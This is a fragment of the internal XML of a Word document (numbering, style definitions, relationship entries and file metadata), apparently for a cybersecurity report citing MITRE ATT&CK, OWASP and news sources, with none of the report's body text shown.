    <w:tmpl w:val="00308AA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743720016">
    <w:abstractNumId w:val="1"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1371615853">
    <w:abstractNumId w:val="0"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1370763613">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1183593516">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="145575835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5D4B"/>
    <w:rsid w:val="0008259B"/>
    <w:rsid w:val="000D5066"/>
    <w:rsid w:val="001535C9"/>
    <w:rsid w:val="001B28AA"/>
    <w:rsid w:val="001D2F79"/>
    <w:rsid w:val="00246B3A"/>
    <w:rsid w:val="002B46F4"/>
    <w:rsid w:val="00380A04"/>
    <w:rsid w:val="00484DB7"/>
    <w:rsid w:val="00543A59"/>
    <w:rsid w:val="005F5D4B"/>
    <w:rsid w:val="00653EBF"/>
    <w:rsid w:val="00732C76"/>
    <w:rsid w:val="00796916"/>
    <w:rsid w:val="008A67B1"/>
    <w:rsid w:val="008C27BE"/>
    <w:rsid w:val="00950431"/>
    <w:rsid w:val="009B25FD"/>
    <w:rsid w:val="009C6B97"/>
    <w:rsid w:val="00B8582B"/>
    <w:rsid w:val="00BD02D4"/>
    <w:rsid w:val="00CA5DC1"/>
    <w:rsid w:val="00CD59AB"/>
    <w:rsid w:val="00D95F4D"/>
    <w:rsid w:val="00E443CF"/>
    <w:rsid w:val="00E4676A"/>
    <w:rsid w:val="00ED2635"/>
    <w:rsid w:val="00FA1D42"/>
    <w:rsid w:val="00FD1BF0"/>
    <w:rsid w:val="00FF4577"/>
    <w:rsid w:val="00FF60F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46152A"/>
  <w15:docId w15:val="{7BEA2F53-CF57-4091-A9F5-0EA745387E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color w:val="1A1A1A"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="ar-SA"/>
      </w:rPr>
    </w:rPrDefault>
    <w:pPrDefault>
      <w:pPr>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keepNext/>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="6" w:space="4" w:color="D7DBE3"/>
      </w:pBdr>
      <w:spacing w:before="320" w:after="120"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1F3864"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="240" w:after="80"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1F3864"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:uiPriority w:val="9"/>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pPr>
      <w:spacing w:after="40"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1F3864"/>
      <w:sz w:val="52"/>
      <w:szCs w:val="52"/>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pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>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pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="EndnoteTextChar">
    <w:name w:val="Endnote Text Char"/>
    <w:link w:val="EndnoteText"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Eyebrow">
    <w:name w:val="Eyebrow"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="40"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:color w:val="595959"/>
      <w:spacing w:val="30"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Subtitle">
    <w:name w:val="Subtitle"/>
    <w:uiPriority w:val="11"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="12" w:space="8" w:color="1F3864"/>
      </w:pBdr>
      <w:spacing w:after="200"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="595959"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E443CF"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E443CF"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E443CF"/>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ettings" Target="settings.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.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192.168.56.101/" TargetMode="External"/><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7.png"/><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6.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId3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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.blackfog.com" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.computerweekly.com" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cybermonitoringcentre.com" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.periculo.co.uk" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://specopssoft.com" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.theguardian.com" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://thehackernews.com" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.legislation.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408</TotalTime>
  <Pages>34</Pages>
  <Words>6147</Words>
  <Characters>35043</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>292</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Dev Gajera</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-07-12T18:16:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-08-17T00:14:00Z</dcterms:modified>
</cp:coreProperties>
</file>